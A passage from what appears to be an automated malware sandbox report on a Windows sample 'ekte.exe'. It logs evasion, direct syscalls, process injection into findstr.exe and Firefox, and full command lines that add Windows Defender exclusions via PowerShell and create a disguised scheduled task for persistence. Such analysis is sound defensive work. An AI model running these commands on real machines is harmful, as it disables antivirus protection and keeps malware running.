            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeMemory allocated: 7ED0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeMemory allocated: 8ED0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_00A00101 rdtsc 8_2_00A00101
            Source: C:\Users\user\Desktop\ekte.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\ekte.exeThread delayed: delay time: 240000Jump to behavior
            Source: C:\Users\user\Desktop\ekte.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeThread delayed: delay time: 240000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\ekte.exeWindow / User API: threadDelayed 3610Jump to behavior
            Source: C:\Users\user\Desktop\ekte.exeWindow / User API: threadDelayed 1842Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1124Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2092Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1635Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1269Jump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeWindow / User API: threadDelayed 2429Jump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeWindow / User API: threadDelayed 2434Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1752
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1740
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2029
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1034
            Source: C:\Windows\SysWOW64\findstr.exeWindow / User API: threadDelayed 9747Jump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sqlite3.dllJump to dropped file
            Source: C:\Windows\SysWOW64\findstr.exeAPI coverage: 1.8 %
            Source: C:\Users\user\Desktop\ekte.exe TID: 3480Thread sleep time: -21213755684765971s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ekte.exe TID: 3480Thread sleep time: -240000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ekte.exe TID: 3480Thread sleep time: -540000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ekte.exe TID: 3724Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ekte.exe TID: 3420Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3568Thread sleep count: 1124 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3568Thread sleep count: 2092 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3744Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3772Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3548Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3760Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3776Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3696Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\taskeng.exe TID: 3860Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe TID: 3908Thread sleep time: -20291418481080494s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe TID: 3908Thread sleep time: -240000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe TID: 3908Thread sleep time: -360000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe TID: 3164Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe TID: 3908Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe TID: 3880Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2104Thread sleep time: -60000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1980Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3052Thread sleep time: -120000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2164Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2676Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\findstr.exe TID: 2088Thread sleep count: 212 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\findstr.exe TID: 2088Thread sleep time: -424000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exe TID: 1332Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exe TID: 2088Thread sleep count: 9747 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\findstr.exe TID: 2088Thread sleep time: -19494000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe TID: 2244Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\findstr.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\findstr.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\findstr.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformationJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 19_2_61E183F0 sqlite3_os_init,GetSystemInfo,sqlite3_vfs_register,sqlite3_vfs_register,sqlite3_vfs_register,sqlite3_vfs_register,19_2_61E183F0
            Source: C:\Users\user\Desktop\ekte.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\ekte.exeThread delayed: delay time: 240000Jump to behavior
            Source: C:\Users\user\Desktop\ekte.exeThread delayed: delay time: 30000Jump to behavior
            Source: C:\Users\user\Desktop\ekte.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeThread delayed: delay time: 240000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeThread delayed: delay time: 30000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeThread delayed: delay time: 30000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_00A00101 rdtsc 8_2_00A00101
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009B07AC NtCreateMutant,LdrInitializeThunk,8_2_009B07AC
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009A0080 mov ecx, dword ptr fs:[00000030h]8_2_009A0080
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009A00EA mov eax, dword ptr fs:[00000030h]8_2_009A00EA
            Source: C:\Users\user\Desktop\ekte.exeCode function: 8_2_009C26F8 mov eax, dword ptr fs:[00000030h]8_2_009C26F8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\ekte.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\ekte.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ekte.exe"
            Source: C:\Users\user\Desktop\ekte.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"
            Source: C:\Users\user\Desktop\ekte.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ekte.exe"Jump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"Jump to behavior
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtQueryInformationProcess: Direct from: 0x774CFAFA
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtCreateUserProcess: Direct from: 0x774D093EJump to behavior
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtCreateKey: Direct from: 0x774CFB62
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtQuerySystemInformation: Direct from: 0x774D20DE
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtQueryDirectoryFile: Direct from: 0x774CFDBAJump to behavior
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtClose: Direct from: 0x774CFA02
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtWriteVirtualMemory: Direct from: 0x774D213EJump to behavior
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtCreateFile: Direct from: 0x774D00D6
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtSetTimer: Direct from: 0x774D021A
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtOpenFile: Direct from: 0x774CFD86
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtSetInformationThread: Direct from: 0x774E9893
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtOpenKeyEx: Direct from: 0x774CFA4A
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtAllocateVirtualMemory: Direct from: 0x774CFAE2
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtResumeThread: Direct from: 0x774D008D
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtOpenKeyEx: Direct from: 0x774D103A
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtUnmapViewOfSection: Direct from: 0x774CFCA2Jump to behavior
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtDelayExecution: Direct from: 0x774CFDA1
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtSetInformationProcess: Direct from: 0x774CFB4A
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtSetInformationThread: Direct from: 0x774CF9CE
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtReadFile: Direct from: 0x774CF915
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtMapViewOfSection: Direct from: 0x774CFC72
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtCreateThreadEx: Direct from: 0x774D08C6
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtDeviceIoControlFile: Direct from: 0x774CF931
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtRequestWaitReplyPort: Direct from: 0x753C6BCE
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtQueryValueKey: Direct from: 0x774CFACA
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtOpenSection: Direct from: 0x774CFDEA
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtProtectVirtualMemory: Direct from: 0x774D005A
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtWriteVirtualMemory: Direct from: 0x774CFE36Jump to behavior
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtRequestWaitReplyPort: Direct from: 0x756F8D92Jump to behavior
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtQueryVolumeInformationFile: Direct from: 0x774CFFAE
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtNotifyChangeKey: Direct from: 0x774D0F92
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtQueryAttributesFile: Direct from: 0x774CFE7E
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtReadVirtualMemory: Direct from: 0x774CFEB2Jump to behavior
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtSetTimer: Direct from: 0x774E98D5
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtSetInformationFile: Direct from: 0x774CFC5AJump to behavior
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeNtQuerySystemInformation: Direct from: 0x774CFDD2
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\ekte.exeMemory written: C:\Users\user\Desktop\ekte.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeMemory written: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\ekte.exeSection loaded: NULL target: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeSection loaded: NULL target: C:\Users\user\Desktop\ekte.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeSection loaded: NULL target: C:\Windows\SysWOW64\findstr.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: NULL target: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: NULL target: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeSection loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\findstr.exeThread APC queued: target process: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ekte.exe"Jump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"Jump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp47BA.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\ekte.exeProcess created: C:\Users\user\Desktop\ekte.exe "C:\Users\user\Desktop\ekte.exe"Jump to behavior
            Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp1A06.tmp"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess created: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"Jump to behavior
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeProcess created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: BuhvZTwGQCD.exe, 0000000F.00000000.392829754.0000000000A80000.00000002.00000001.00040000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000002.626635514.0000000000A80000.00000002.00000001.00040000.00000000.sdmp, BuhvZTwGQCD.exe, 00000014.00000002.626934428.0000000000BA0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: BuhvZTwGQCD.exe, 0000000F.00000000.392829754.0000000000A80000.00000002.00000001.00040000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000002.626635514.0000000000A80000.00000002.00000001.00040000.00000000.sdmp, BuhvZTwGQCD.exe, 00000014.00000002.626934428.0000000000BA0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: BuhvZTwGQCD.exe, 0000000F.00000000.392829754.0000000000A80000.00000002.00000001.00040000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000002.626635514.0000000000A80000.00000002.00000001.00040000.00000000.sdmp, BuhvZTwGQCD.exe, 00000014.00000002.626934428.0000000000BA0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: !Progman
            Source: C:\Users\user\Desktop\ekte.exeQueries volume information: C:\Users\user\Desktop\ekte.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
